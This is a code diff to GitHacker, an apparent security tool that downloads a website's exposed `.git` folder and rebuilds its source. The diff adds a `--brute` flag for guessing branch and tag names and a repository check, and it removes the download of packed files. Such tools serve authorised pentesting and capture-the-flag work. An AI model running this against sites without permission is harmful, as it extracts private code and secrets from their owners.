@@ -10,6 +10,8 @@ import subprocess
 import argparse
 import bs4
 
+__version__ = "1.0.7"
+
 coloredlogs.install(fmt='%(asctime)s %(levelname)s %(message)s')
 
 
@@ -19,15 +21,22 @@ def md5(data):
 
 
 class GitHacker():
-    def __init__(self, url, dst, threads=0x08) -> None:
+    def __init__(self, url, dst, threads=0x08, brute=True) -> None:
         self.q = queue.Queue()
         self.url = url
         self.dst = dst
         self.repo = None
         self.thread_number = threads
         self.max_semanic_version = 10
+        self.brute = brute
 
     def start(self):
+        # Ensure the target is a git folder via `.git/HEAD`
+        if requests.head("{}{}".format(self.url, ".git/")).status_code != 200:
+            logging.error(
+                "The target url is not a valid git repository, `.git/HEAD` not exists")
+            return
+
         for _ in range(self.thread_number):
             threading.Thread(target=self.worker, daemon=True).start()
 
@@ -68,7 +77,6 @@ class GitHacker():
                 self.add_folder(url, href)
             else:
                 file_url = "{}{}".format(url, href)
-                print("file:", file_url)
                 path = file_url.replace(self.url, "").split("/")
                 self.q.put(path)
 
@@ -103,11 +111,6 @@ class GitHacker():
             else:
                 break
 
-        logging.info("Running packed files...\r")
-        tn = self.add_packed_file_tasks()
-        if tn > 0:
-            self.q.join()
-
         self.checkout()
 
     def checkout(self):
@@ -121,33 +124,6 @@ class GitHacker():
 
         logging.info("Check it out in folder: {}".format(self.dst))
 
-    def add_packed_file_tasks(self):
-        # Download .git/objects/info/pack
-        info_pack = [".git", "objects", "info", "pack"]
-        fs_path = os.path.join(self.dst, os.path.sep.join(info_pack))
-        url_path = "/".join(info_pack)
-        url = "{}{}".format(self.url, url_path)
-        status_code, length, result = self.wget(url, fs_path)
-
-        n = 0
-        if result:
-            logging.info("Pack info [{}]: {} bytes\r".format(
-                status_code, length))
-            with open(fs_path, "rb") as f:
-                content = f.read()
-            hashes = re.findall(r"([a-f\d]{40})", content)
-            for hash in hashes:
-                n += 2
-                # Download .git/objects/pack/pack-{hash}.idx
-                self.q.put([".git", "objects", "pack",
-                            "pack-{}.idx".format(hash)])
-                # Download .git/objects/pack/pack-{hash}.pack
-                self.q.put([".git", "objects", "pack",
-                            "pack-{}.pack".format(hash)])
-        else:
-            logging.error("No packed files")
-        return n
-
     def add_hashes_parsed(self, content):
         hashes = re.findall(r"([a-f\d]{40})", content)
         n = 0
@@ -218,16 +194,23 @@ class GitHacker():
         ]
 
         # git tags
-        for major in range(self.max_semanic_version):
-            for minor in range(self.max_semanic_version):
-                for patch in range(self.max_semanic_version):
-                    files.append(
-                        [".git", "refs", "tags", "v{}.{}.{}".format(major, minor, patch)])
-                    files.append(
-                        [".git", "refs", "tags", "{}.{}.{}".format(major, minor, patch)])
+        if self.brute:
+            for major in range(self.max_semanic_version):
+                for minor in range(self.max_semanic_version):
+                    for patch in range(self.max_semanic_version):
+                        files.append(
+                            [".git", "refs", "tags", "v{}.{}.{}".format(major, minor, patch)])
+                        files.append(
+                            [".git", "refs", "tags", "{}.{}.{}".format(major, minor, patch)])
+        else:
+            files.append([".git", "refs", "tags", "v0.0.1"])
+            files.append([".git", "refs", "tags", "0.0.1"])
+            files.append([".git", "refs", "tags", "v1.0.0"])
+            files.append([".git", "refs", "tags", "1.0.0"])
 
         branch_names = ["master", "main", "dev", "release", "test",
-                        "testing", "feature", "ng", "fix", "hotfix", "quickfix", ]
+                        "testing", "feature", "ng", "fix", "hotfix", "quickfix"]
+
         # git remote branches
         expand_branch_name_folder = [
             [".git", "logs", "refs", "heads", None],
@@ -235,6 +218,7 @@ class GitHacker():
             [".git", "refs", "remotes", "origin", None],
             [".git", "refs", "heads", None],
         ]
+
         for folder in expand_branch_name_folder:
             for branch_name in branch_names:
                 folder_copy = folder.copy()
@@ -317,14 +301,18 @@ def main():
                         help='url of the target website which expose `.git` folder')
     parser.add_argument('--folder', required=True,
                         help='the local folder to store the git repository')
+    parser.add_argument('--brute', required=False, action="store_true",
+                        help='enable brute forcing branch/tag names')
     parser.add_argument('--threads', required=False, default=0x04,
                         type=int, help='threads number to download from internet')
+    parser.add_argument('--version', action='version', version=__version__)
     args = parser.parse_args()
     GitHacker(
-        append_if_not_exists(remove_suffixes(
+        url=append_if_not_exists(remove_suffixes(
             args.url, ['.git', '.git/']), '/'),
-        args.folder,
+        dst=args.folder,
         threads=args.threads,
+        brute=args.brute,
     ).start()
 
 
